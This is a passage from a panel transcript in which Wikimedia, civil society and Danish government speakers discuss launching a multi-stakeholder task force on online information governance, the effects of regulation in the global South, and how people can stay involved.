Well, I see the creation of the task force also the launch of the principles today as sort of an invitation to help figure this out. I mean, I think we gotta be honest here that there’s no clear strategic path forward, right? There’s, I think, and I guess this speaks actually to the challenge of having all these processes that are somewhat loosely related, but where the coordination and connection isn’t always so clear. And having such a task force that actually brings together governments and civil society, and hopefully also really proactive private actors can help as that, I think, coordination group that maps these processes and coordinates how we all speak with one another and maybe with others that we need to bring along. I think from a Wikipedia perspective, our team’s main task is often to educate people about how Wikipedia actually works. Everybody uses it, but nobody really knows what’s under the hood. And once we start educating policy makers and governments about that, they’re like, oh, wow, this, I didn’t know this, right? This is something we should be protecting. And we’re, I mean, we’re seeing this as an opportunity to actually do this in an FOC context to bring along governments who have very lofty diplomatic goals, but we’d love to sort of get them engaged on this and through diplomatic briefings, help them also understand what’s at stake elsewhere, right? It’s one way to say, one thing to say, yes, the EU is regulating the online spaces, and it’s also just learning how to do this a little bit, but then showing the real effects that some of these regulations have in places where Wikipedians sit in the global South and are affected by this, are affected by maybe a mechanism that forces platforms to remove content or are affected by laws to retain data. And just sort of, I think, having this as a focal point where these conversations happen, I think is the strongest sort of proposition that this task force actually has.

Moderator:
Reactions or thoughts? We’ve got four minutes left.

Ivan Sigal:
Just make a final comment. Well, I wanna say thank you. I thought your point was very clear and very helpful. I mean, all of these three points are in some ways a challenge to traditional stakeholder positions, and embedding that challenge within the framework of a intergovernmental group is itself a strategy, right? It is itself to say, here’s a way of talking about those, and bringing these communities that traditionally don’t have a lot of power, are traditionally dispersed, and because they’re dispersed, it’s very, very hard to organize around some kind of considered position, and then to present that in a framework in which it does actually have a, is in dialogue with entities that have the potential, at least, to think about regulation, think about supporting positions. Look, this conversation’s been going on for a very long time. Attempts to build principles, attempts to build coalitions. The Web We Want project was, the Web Foundation was 12 years ago, 14 years ago. Now, there’s older projects as well that have a lot of the same kind of language, and they tend to disintegrate because there isn’t a formal structure for maintaining and supporting them that has an engagement with any kind of regulatory process. I was just sitting here and doodling on the different domains of authority and knowledge where these things, these issues take place, right? Speech, privacy, antitrust, content moderation, four different domains of expertise that often have conflicting goals, conflicting ends towards what they would like to see as an ideal regulatory environment, an ideal solution for some of the problems we see. Even fundamentally, sometimes fundamentally, different understandings of what the problem even is. And I think our basic goal here is to make sure that the voices of the communities that we work with are included in those conversations and not ignored, not skipped over because we have less power, potentially, or fewer resources, or because we don’t have a profit motive that underlines our activities. So I’ll stop there and let you guys continue.

Moderator:
Thank you. I think I should, we’ve got one question.

Audience:
One comment that I need an answer from you because I represent Sri Lanka, Internet Governance Initiative of Sri Lanka. So at the moment, there is a proposed bill regarding internet safety in Sri Lanka, which is almost the first reading had done in the parliament which is mostly discusses about the internet safety but it creates regulations to censorship, to fragmented internet, and also it harmful for the platforms, media, and users as well. So where these kind of issues comes, where you stand, how we reach to you, how we can do an action for us as a people we are in the developing world. Thank you.

Moderator:
Yeah, thank you so much for that. One for highlighting the upcoming bill in Sri Lanka but also flagging kind of the concluding question of the panel, which is next steps, how can people stay connected to the work and get in touch? So maybe I will hand to Clara and then maybe Jan if you could speak to the next steps and how people can stay connected to the work of the task force. But before that, did you have any kind of concluding remarks or reactions to anything that’s been said?

Klara Therese Christensen:
Yeah, thanks. I think I was, sorry. I also just wanted to comment sort of on this issue between sort of giving serenity or authority when you sort of work in this multi-stakeholder approach. And I do think that that is of course a challenge but I also think that this is the only way to build like good reliable regulation that actually gets implemented. If we don’t have buy-in from the private sector, for example, it is super hard to make sort of sound regulation that actually will have an impact. And I think that’s why it’s so important and something that we work for from the Danish side to sort of like try to include more private sector engagement, more civil society engagement to actually make sure that when we do make regulation then it’s well-informed and we have some buy-in to actually make it work out in the real world. So I do think this is like a very good example of like why this is difficult, why it takes time but also why this is sort of the only way we can do because states and governments, they can do so much but if we don’t have sort of buy-in from the rest of the ecosystem, I think it’s gonna be really difficult to like create more trustworthy information online because the internet is not only regulated by government, right, it’s like, it’s so sort of big and also live beyond sort of the serenity of the states. I think that’s something that provides some challenges but also some really great opportunities and forces us to go into deeper dialogue with some of our counterparts. And I do think that that’s sort of some of the important work that we should sort of continue working on in this task force.

Moderator:
Yeah, thanks so much. Maybe on to the last question of what’s next for the task force and how people can stay connected?

Jan Gerlach:
Well, first of all, we’re excited to launch this today officially and as a task force, I think we hope to grow and find many more people who want to contribute so that’s one way to stay connected and be part of this hopefully growing momentum. We just connected on this actually and I think as co-chairs, Wikimedia, we’re interested in people following us. There’s spaces for discussion like mailing lists, public policy mailing lists. I think one way to also be part of this is actually to become a Wikipedian. If I can do a shameless plug here. And just understand this better, right? I think that’s sort of my whole point here. We need people around the world to understand what is going on and how these systems work, how the citizen journalism space works, how Wikipedia works, how all these civic spaces actually function and by joining them, you’re making a huge contribution, right? And obviously, we don’t wanna make this all like individual responsibilities, right? That’s why there are organizations like ours as well. But staying connected through these very communities that we support is one really meaningful way to actually help because at the end of the day, we are just here to serve them, right? And by directly joining them, you’re actually doing very helpful work. So yeah, be part of this and try to stay connected in that way. Yeah, thank you.

Moderator:
So with that, I think we are out of time. Thank you so much for everybody’s participation and your inputs. And if you are interested in learning more about the task force or even participating, please do talk to one of us up here. Thank you.

Alisson Peters

Speech speed

163 words per minute

Speech length

515 words

Speech time

189 secs

Audience

Speech speed

169 words per minute

Speech length

1091 words

Speech time

388 secs

Ivan Sigal

Speech speed

179 words per minute

Speech length

2083 words

Speech time

698 secs

Jan Gerlach

Speech speed

170 words per minute

Speech length

1645 words

Speech time

580 secs

Klara Therese Christensen

Speech speed

180 words per minute

Speech length

1507 words

Speech time

502 secs

Moderator

Speech speed

168 words per minute

Speech length

1929 words

Speech time

690 secs